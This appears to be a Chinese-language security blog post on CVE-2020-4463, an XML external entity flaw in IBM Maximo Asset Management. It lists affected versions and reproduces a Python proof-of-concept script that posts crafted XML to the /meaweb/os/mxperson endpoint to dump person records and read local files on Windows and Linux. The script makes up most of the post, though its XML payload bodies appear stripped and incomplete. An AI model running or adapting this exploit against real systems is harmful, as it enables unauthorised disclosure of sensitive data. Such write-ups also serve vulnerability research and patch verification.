IBM Maximo Asset Management XXE漏洞(CVE-2020-4463)

# IBM Maximo Asset Management XXE漏洞(CVE-2020-4463)

在处理XML数据时,IBM Maximo Asset Management容易受到XML外部实体注入(XXE)攻击。远程攻击者可能利用此漏洞来泄露敏感信息或消耗内存资源。

受影响的核心组件:

* IBM Maximo资产管理7.6.0
* IBM Maximo资产管理7.6.1
* IBM Maximo资产管理7.6.0之前的所有版本

CVE-2020-4463-PoC:

“`python
#!/usr/bin/python3
############
# @Author Ibonok
#
# CVE-2020-4463 IBM Maximo XXE
#
# Do not use this in productiv enviroments.
# For educational use only.
#
############

from colorama import init, Fore, Style
import sys
import requests
import argparse

def dataeleak_example(url):
# Mandatory Headers
headers = {‘Content-Type’: ‘application/xml’}
basepath = “/meaweb/os/mxperson”

# DUMP MXPERSON
xml_query = “””



“””

print (requests.post(url + basepath, data=xml_query, headers=headers, verify=False).text)

def xxe_example(url):
# Mandatory Headers
headers = {‘Content-Type’: ‘application/xml’}
basepath = “/meaweb/os/mxperson”

# XXE Windows
xml_query = “””


]>



&xxe;


“””

print (requests.post(url + basepath, data=xml_query, headers=headers, verify=False).text)

# XXE Linux
xml_query = “””


]>



&xxe;


“””

print (requests.post(url + basepath, data=xml_query, headers=headers, verify=False).text)

def check_args ():
init(autoreset=True)
pars = argparse.ArgumentParser(description=Fore.GREEN + Style.BRIGHT + ‘CVE-2020-4463 PoC Data Leakage and XXE’ + Style.RESET_ALL)

pars.add_argument(‘-x’, ‘–xxe’, nargs=’?’, type=str2bool, default=False, const=True, help=’XXE (Linux/Windows)’)
pars.add_argument(‘-d’, ‘–dataleak’, nargs=’?’, type=str2bool, default=False, const=True, help=’Data Leakage REST request MXPERSON. May take a long time.’)
pars.add_argument(‘–url’, nargs=’?’, help=’Target URL http://, https://’)

args = pars.parse_args()

if args.url is None:
pars.error(Fore.RED + ‘–url required’)
elif args.url and args.xxe is False and args.dataleak is False:
pars.error(Fore.RED + ‘-x/-xxe, or -d/–dataleak is missing’)
elif args.url and args.xxe:
return args.url, args.xxe, args.dataleak
elif args.url and args.dataleak:
return args.url, args.xxe, args.dataleak
elif args.url and args.xxe and args.dataleak:
pars.error(Fore.RED + ‘To many Parameters, please check –help’)

def single_url(url, xxe, dataleak):

if dataleak:
dataeleak_example ( url)
elif xxe:
xxe_example ( url)
else:
sys.exit()

def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in (‘yes’, ‘true’, ‘t’, ‘y’, ‘1’):
return True
elif v.lower() in (‘no’, ‘false’, ‘f’, ‘n’, ‘0’):
return False
else:
raise argparse.ArgumentTypeError(‘Boolean value expected.’)

if __name__ == “__main__”:
try:
(url, xxe, dataleak) = check_args()
single_url(url, xxe, dataleak)
except KeyboardInterrupt:
sys.exit()

“`

如果您收到以下响应,则两个漏洞均不存在。

Error 500: BMXAA1268E – No user credentials.

ref:

https://github.com/Ibonok/CVE-2020-4463

https://forum.ywhack.com/thread-114787-1-3.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容